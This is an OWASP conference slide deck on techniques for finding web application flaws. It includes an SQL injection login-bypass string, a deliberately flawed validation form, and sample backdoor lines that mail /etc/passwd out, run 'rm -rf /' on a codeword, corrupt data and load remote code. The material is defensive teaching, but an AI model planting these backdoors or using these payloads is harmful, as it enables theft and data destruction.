Copyright © 2004 - The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License.
The OWASP Foundation
4th Annual NTC ISSA InfoSec Nashville Conference August 24, 2005
http://www.owasp.org
The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software
Jeff Williams
CEO, Aspect Security
Chair, OWASP
[email protected]
The Future

[Mock "Software Facts" label, in the style of a nutrition label]

Software Facts
Expected Number of Users        15
Typical Roles per Instance      4
Modules                         155
Modules from Libraries          120
                                        % Vulnerability*
Cross Site Scripting            22      65%
  Reflected                     12
  Stored                        10
SQL Injection                   2
Buffer Overflow                 5
Total Security Mechanisms       3
Encryption                      3
Authentication                  15
                                        95%
Access Control                  3
Input Validation                233
Logging                         33
Modularity                      .035
Cyclomatic Complexity           323

* % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs:

Usage                           Intranet        Internet
Cross Site Scripting            Less Than 10    5
  Reflected                     Less Than 10    5
  Stored                        Less Than 10    5
SQL Injection                   Less Than 20    2
Buffer Overflow                 Less Than 20    2
Security Mechanisms             10              14
Encryption                      3               15

Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1
Today
Code is code
    All sectors
    All languages
    All platforms
    All computing models
    All sizes
    Intra/Extra/Inter-net
New types of vulnerabilities are rare
The market doesn’t value secure code
We trust code we shouldn’t
Cheaper, faster only
We don’t have any idea whether our code is trustworthy or not
Why Find Vulnerabilities?
Nobody believes their software is vulnerable
    “If the software works, then it must be secure”
Finding flaws starts you on the path
[Cycle diagram: Find Flaws -> Fix -> Find Flaws -> Improve -> Find Flaws -> Improve ...]
If you’re not finding them, you’re allowing them
Software Is A Black Box
Complex
    Millions of lines of code
    Layers of leaky abstractions
    Massively interconnected
Compiled
    Difficult to reverse engineer
    Different on every platform
Legal Protections
    No peeking
    We’re not liable
Key Vulnerabilities
A few serious common vulnerabilities…
    Broken Access Control
    Weak Authentication and Session Management
    SQL Injection
    Cross Site Scripting
For more information see… The Top Ten Most Critical Web Application Vulnerabilities
(www.owasp.org/documentation/topten.html)
A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)
SQL Injection Illustrated

[Diagram: the request crosses the Network Layer (Firewall, Hardened OS, Web Server, App Server, Firewall) into the Application Layer, where Custom Code implementing the business functions (Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions) sits in front of the back end (Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing). The APPLICATION ATTACK flows as: HTTP request -> SQL query -> DB Table -> HTTP response.]

    SELECT * FROM users WHERE user='' OR 1=1--' AND pass='password'

1. Application presents a login form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends results to application
5. Application thinks login worked and sends welcome page

Successful Login: “Welcome, Alice”
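The five steps above, run end to end against a constructed in-memory SQLite table (added example, not code from the slides): the concatenated query from the diagram returns Alice's row for the attacker's form data, while the same query with bind parameters returns nothing.

```python
import sqlite3

# Constructed in-memory stand-in for the slide's "DB Table": one valid account.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('Alice', 's3cret')")
    return db

def login_vulnerable(db, user, password):
    # Step 3 on the slide: form fields are pasted straight into the SQL text,
    # so the attacker's quote plus comment sequence rewrites the WHERE clause.
    query = f"SELECT * FROM users WHERE user='{user}' AND pass='{password}'"
    return db.execute(query).fetchall()

def login_parameterized(db, user, password):
    # Same query with bind parameters: the values travel separately from the
    # SQL text, so "' OR 1=1--" is compared as a literal username and matches nothing.
    query = "SELECT * FROM users WHERE user=? AND pass=?"
    return db.execute(query, (user, password)).fetchall()

def welcome(rows):
    # Step 5: the application treats any returned row as a successful login.
    return f"Welcome, {rows[0][0]}" if rows else "Login failed"

if __name__ == "__main__":
    db = make_db()
    form_user, form_pass = "' OR 1=1--", "password"   # the form data from the slide
    print(welcome(login_vulnerable(db, form_user, form_pass)))     # Welcome, Alice
    print(welcome(login_parameterized(db, form_user, form_pass)))  # Login failed
```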
Scanning for SQL Injection
Method
    Use “signatures” to send malformed SQL commands
    Analyze responses to see if it “worked”
    Nessus, nikto, absinthe
Pros
    Requires only network access to application
    Fast and easy to run
Cons
    May only exercise part of an application
    Prone to false alarms and missed positives
    Results indicate URL but not line of code
    Can be problems with credentials, roles, and SSL
Static Analysis for SQL Injection
Method
    Automatically analyze source code for patterns
    Tools load source code, compile, and analyze
Pros
    Requires only the software baseline
    Fast and easy to run
Cons
    Can’t factor in the runtime environment
    Prone to false alarms and missed positives
    Results indicate line of code but not URL
    Doesn’t find design problems
Penetration Testing for SQL Injection
Method
    Custom attacks by an expert security tester
    Use OWASP WebScarab to craft custom attacks
    Expert analyzes responses to see if attack worked
Pros
    Open source tools available
    Recommend an internal team
Cons
    Requires expertise in security, software, and SQL
    Difficult to exercise the entire application
    Tester may not be able to determine success
Code Review for SQL Injection
Method
    Reviewer analyzes code for patterns
    Use tools to view baseline in different ways
    Examine mechanisms, common vulnerability areas
Pros
    Cost-effective
    Can examine the entire baseline
Cons
    Can’t factor in the runtime environment
    Requires skills in software and security
Security Analysis Techniques

Find Vulnerabilities Using the Running Application
    Automated Vulnerability Scanning
    Manual Penetration Testing
Find Vulnerabilities Using the Source Code
    Automated Static Code Analysis
    Manual Code Review

Combining All Four Techniques is Most Effective
Vulnerability Patterns

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpSession;
    import org.apache.struts.action.ActionForm;

    // Deliberately flawed example from the slide; the labels in the comments
    // are the slide's own annotations. UserBean and logger are framework
    // classes not shown on the slide.
    public class DamagedStrutsForm extends ActionForm {

        public void doForm(HttpServletRequest request) {
            HttpSession session = request.getSession();
            UserBean u = session.getUserBean();
            // Failure to Validate: raw request parameters are stored as-is
            u.setName(request.getParameter("name"));
            // Failure to Validate: "color" is never checked anywhere
            u.setFavoriteColor(request.getParameter("color"));
        }

        public boolean validate(HttpServletRequest request) {
            try {
                // Blacklist Validation: only the literal "<scri" is rejected
                // Time of Check, Time of Use: checks "Name", but doForm() uses "name"
                if (request.getParameter("Name").indexOf("<scri") != -1) {
                    logger.log("Script detected");
                    return false;
                }
            } catch (Exception e) {
                // Fail Open: a missing parameter throws NullPointerException,
                // which is swallowed here and the form is accepted
            }
            // Failure to Validate: everything else passes
            return true;
        }
    }
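The same three patterns, reproduced in Python as an added example (not the slide's code) so each defect can be exercised against constructed requests: validate_damaged mirrors the slide's validate() method, and validate_fixed shows the allow-list, same-key, fail-closed form. FakeRequest is a hypothetical stand-in for HttpServletRequest whose getParameter returns None for an absent parameter, as the servlet API does.

```python
import re

class FakeRequest:
    # Constructed stand-in for HttpServletRequest: getParameter returns None
    # when the parameter is absent, just like the servlet API.
    def __init__(self, params):
        self._params = params

    def getParameter(self, name):
        return self._params.get(name)

def validate_damaged(request):
    # Mirrors DamagedStrutsForm.validate():
    #  - Blacklist Validation: only the literal "<scri" is rejected,
    #  - Time of Check, Time of Use: inspects "Name" while doForm() stores "name",
    #  - Fail Open: any exception (None has no .find) is swallowed and the form
    #    is accepted; "color" is never examined at all.
    try:
        if request.getParameter("Name").find("<scri") != -1:
            return False
    except Exception:
        pass
    return True

# Allow-lists for the two parameters doForm() actually stores (constructed).
NAME_RE = re.compile(r"[A-Za-z][A-Za-z .'-]{0,39}")
COLOR_RE = re.compile(r"red|green|blue|yellow")

def validate_fixed(request):
    # Hardened form: check exactly the parameters doForm() uses, under the same
    # keys, against an allow-list, and fail closed when anything is missing.
    name = request.getParameter("name")
    color = request.getParameter("color")
    if name is None or color is None:
        return False
    return bool(NAME_RE.fullmatch(name) and COLOR_RE.fullmatch(color))
```

Run validate_damaged with a request that carries only "name" and "color": the lookup of "Name" returns None, the resulting exception is swallowed, and a script payload in "name" is accepted; validate_fixed rejects it.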
A Change In Perspective
Think like an attacker!
    Understand how the application works
    Especially the security mechanisms
    How does the application make security decisions?
The easy part?
    Test and analyze for a single vulnerability
The hard part?
    Do an entire application for all types of vulnerabilities
Getting Started
Adopt the OWASP Top Ten
    Set the bar
Spot check a few applications
    Are your security mechanisms easy to understand?
    Are you doing validation, error handling, logging, etc.?
Get security out in the open!
Come to my talk later to find out more!!!
OWASP Can Help
Open Web Application Security Project
    Nonprofit Foundation
    All materials available under approved open source licenses
    Dozens of projects, over 50 chapters worldwide, thousands of participants, and millions of hits a month
OWASP is dedicated to finding and fighting the causes of insecure software
OWASP Supports Vulnerability Analysis
OWASP Top Ten Set priorities, get management buy-in
OWASP Guide 300 page book for application security
OWASP Testing Guide Test/analysis methods for application security
OWASP WebScarab Web application & web service penetration tool
Some of What You’ll Find at OWASP
Community: Local Chapters, Translations, Conferences, Mailing Lists, Papers, and more…
Documentation: Guide, Top Ten, Testing, Legal, AppSec FAQ, and more…
Tools: WebGoat, WebScarab, Stinger, DotNet, and more…
All free and open source. We encourage your company to support us by becoming a member.
What Could a Malicious Developer Do?
Trojan Horse runs for admin
    if ( System.getCurrentUser().getName().equals( "admin" ) )
        Runtime.exec( "sendmail [email protected] < /etc/passwd" );
Secret trigger removes all files on root partition
    if ( req.getParameter( "codeword" ).equals( "eagle" ) )
        Runtime.exec( "rm –rf /" );
Randomly corrupt data one time in 100
    if ( Math.random() < .01 )
        bean.setValue( "corrupt" );
Load and execute code from remote server
    ((A)(ClassLoader.getSystemClassLoader().defineClass( null, readBytesFromNetwork(), 0, 422 ).newInstance())).attack();
Make backdoor look like inadvertent mistake
    if ( input < 0 )
        throw new RuntimeException( "Input error" );
Impossible to tell malicious from mistake
Who wrote the libraries your application uses?
Questions and Answers